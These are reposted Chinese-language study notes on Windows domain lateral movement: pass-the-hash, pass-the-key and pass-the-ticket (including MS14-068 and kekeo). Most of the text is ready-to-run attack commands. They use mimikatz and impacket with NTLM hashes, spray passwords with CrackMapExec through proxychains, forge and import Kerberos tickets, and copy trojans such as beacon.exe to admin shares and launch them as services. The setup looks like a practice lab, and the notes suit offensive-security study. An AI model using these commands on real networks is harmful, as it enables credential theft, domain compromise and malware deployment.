- 基于凭证- pth(pass the hash)- 原理- PTH在内网渗透中是一种很经典的攻击方式,原理就是攻击者可以直接通过LM Hash和NTLM Hash访问远程主机或服务,而不用提供明文密码(impaket的各种协议)- 如果禁用了ntlm认证,PsExec无法利用获得的ntlm hash进行远程连接,但是使用mimikatz还是可以攻击成功。(mimikatz)- mimikatz的hash传递攻击- 先提权- mimikatz sekurlsa::pth /user:administrator /domain:192.168.3.21 /ntlm:ccef208c6485269c20db2cad21734fe7(这条语句输入完 会在被控主机30的电脑界面弹出一个shell)- 下面的操作都是在该shell下执行的- net use \192.168.3.21\c$ (尝试与21主机建立c盘文件的共享连接)- copy cws.exe \192.168.3.21\c$(把30主机的木马复制到21主机)- sc \192.168.3.21 create bshell binpath= "c:\tool\cws.exe"(创建服务 路径为木马的路径)(在21主机的计算机管理-服务和应用程序-服务-bshell查看是否创建)- sc \192.168.3.21 start bshell (启动服务 也就是启动木马-会成功上线)- 不知道为啥启动服务失败- impacket-at&ps&wmi&smb- atexec- psexec- psexec -hashes :NTLM值 域名/域用户@域内ip地址- wmi- wmiexec -hashes :NTLM值 域名/域用户@域内ip地址- smb- smbexec -hashes :NTLM值 域名/域用户@域内ip地址- 这些协议也有对应的py版本 可以配置代理去本机执行- 具体看上面的基于协议的笔记- Proxychains&CrackMapExec 代理+密码喷射- 建立socks连接,设置socks代理,配置规则,调用- 代理配置:Proxychains.conf- 密码喷射-域用户登录PTH:- 域用户hash登录- proxychains python cme smb 192.168.3.21-32 -u user.txt -H 518b98ad4178a53695dc997aa02d455c- 本地用户hash登录- proxychains python cme smb 192.168.3.21-32 -u administrator -H 518b98ad4178a53695dc997aa02d455c --local-auth- ptk- 原理及利用条件- 对于8.1/2012r2,安装补丁kb2871997的Win 7/2008r2/8/2012等,可以使用AES keys代替NT hash来实现ptk攻击- pth:没打补丁用户都可以连接,打了补丁只能administrator连接- ptk:打了补丁才能用户都可以连接,采用aes256连接- 当系统安装了KB2871997补丁且禁用了NTLM的时候, 那我们抓取到的ntlm hash也就失去了作用,但是可以通过PTK的攻击方式获得权限- 鸡肋:因为只有禁用了NTLM才能利用 而且还要打了补丁- mimikatz sekurlsa::ekeys (获取aes256值)- mimikatz sekurlsa::pth /user:域用户名 /domain:域名 /aes256:aes256值- ptt- 漏洞-MS14068(webadmin权限)-利用漏洞生成的用户的新身份票据尝试认证- 原理- MS14-068是密钥分发中心(KDC)服务中的Windows漏洞。 它允许经过身份验证的用户在其Kerberos票证(TGT)中插入任意PAC。 该漏洞位于kdcsvc.dll域控制器的密钥分发中心(KDC)中。 用户可以通过呈现具有改变的PAC的Kerberos TGT来获得票证- 伪造域管TGT 利用该漏洞 伪造用户身份tgt票据(类似web的cookie伪造) 条件:取得一个域内用户权限即可- 获取SID值:shell whoami/user- 根据sid值生成票据文件:shell ms14-068.exe -u fileadmin@god.org -s S-1-5-21-1218902331-2157346161-1782232778-1132 -d 192.168.3.21 -p Admin12345- (查看票据:shell klist)- (清除票据连接:shell klist purge)- -p 是指fileadmin的密码- 内存导入票据:mimikatz kerberos::ptc TGT_fileadmin@god.org.ccache- 连接目标上线:shell dir \OWA2010CN-GOD\c$- shell net use \OWA2010CN-GOD\C$- copy beacon.exe \OWA2010CN-GOD\C$- sc \OWA2010CN-GOD create bindshell binpath= "c:\ncws.exe"- sc \OWA2010CN-GOD start bindshell- 注意:成功不成功看DC域控漏洞补丁打没打- kekeo(高权限,需NTLM)-利用获取的NTLM生成新的票据尝试认证- 原理及条件- 因为当前主机肯定之前与其他主机连接过,所以本地应该生成了一些票据, 我们可以导出这些票据,然后再导入票据,利用。该方法类似于cookie欺骗- 缺点:票据是有有效期的,所以如果当前主机在连接过域控的话,有效期内可利用。- 注意:成功不成功看ntlm哈希值的正确性- 利用- 生成票据(可以理解为请求票据把他生成到桌面):shell kekeo "tgt::ask /user:Administrator /domain:god.org /ntlm:ccef208c6485269c20db2cad21734fe7" "exit"- 导入票据:shell kekeo "kerberos::ptt TGT_Administrator@GOD.ORG_krbtgt~god.org@GOD.ORG.kirbi" "exit"- 查看票据:shell klist- 利用票据连接:shell dir \owa2010cn-god\c$- mimikatz(高权限,需Ticket)-利用历史遗留的票据重新认证尝试- 注意需要高权限(mimikatz需要高权限 )并且需要该主机有被想要连接的主机所登录过- 导出票据: mimikatz sekurlsa::tickets /export- 导入票据: mimikatz kerberos::ptt C:\Users\webadmin\Desktop[0;2ba64c]-2-0-40e00000-Administrator@krbtgt-god.org.kirbi- [0;2ba64c]-2-0-40e00000-Administrator@krbtgt-god.org.kirbi (这个文件会生成在桌面上 自己根据生成的名字去输入)- 查看票据:shell klist- 利用票据连接:shell dir \owa2010cn-god\c$
标签:
网络
本文转载自: https://blog.csdn.net/weixin_63920195/article/details/140574705
版权归原作者 v1nche3 所有, 如有侵权,请联系我们删除。
版权归原作者 v1nche3 所有, 如有侵权,请联系我们删除。